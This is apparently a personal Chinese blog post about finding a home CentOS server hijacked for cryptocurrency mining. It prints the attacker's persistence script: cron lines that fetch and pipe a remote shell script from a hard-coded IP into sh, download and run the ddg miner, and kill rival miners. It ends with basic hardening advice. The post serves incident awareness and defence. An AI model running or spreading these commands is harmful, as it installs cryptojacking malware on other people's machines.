發現小伺服器被入侵了 cpu長期100%
阿新 • • 發佈:2019-01-30
前兩天用路由開了個外網埠,把自己的一臺centos6.5桌上型電腦掛上了外網。還挺有成就感的。
定時任務裡有個每晚23點30自動關機的操作。昨天發現沒有自動關機,沒在意就手動關了。
今天本想檢視一下定時任務,排查下問題。
後來發現竟然給入侵了,用來跑比特幣挖礦:
crontab -l
查看了一下網址下的指令碼:
原始碼:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/root echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/root mkdir -p /var/spool/cron/crontabs echo "*/5 * * * * curl -fsSL http://218.248.40.228:8443/i.sh | sh" > /var/spool/cron/crontabs/root echo "*/5 * * * * wget -q -O- http://218.248.40.228:8443/i.sh | sh" >> /var/spool/cron/crontabs/root if [ ! -f "/tmp/ddg.2020" ]; then curl -fsSL http://218.248.40.228:8443/2020/ddg.$(uname -m) -o /tmp/ddg.2020 fi if [ ! -f "/tmp/ddg.2020" ]; then wget -q http://218.248.40.228:8443/2020/ddg.$(uname -m) -O /tmp/ddg.2020 fi chmod +x /tmp/ddg.2020 && /tmp/ddg.2020 ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill #ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill #ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
ip 218.248.40.228 來源:
後臺查詢結果:ll -h /tmp/
修改建議:
密碼 :越複雜越好
ssh埠 :. 65535以下 1000以上 隨意改一個埠
防火牆:必需開,提高安全等級
嚇的我趕緊把伺服器關閉了。。。
然後查閱大量的防止暴力破解密碼,網路安全的部落格,好好補補腦子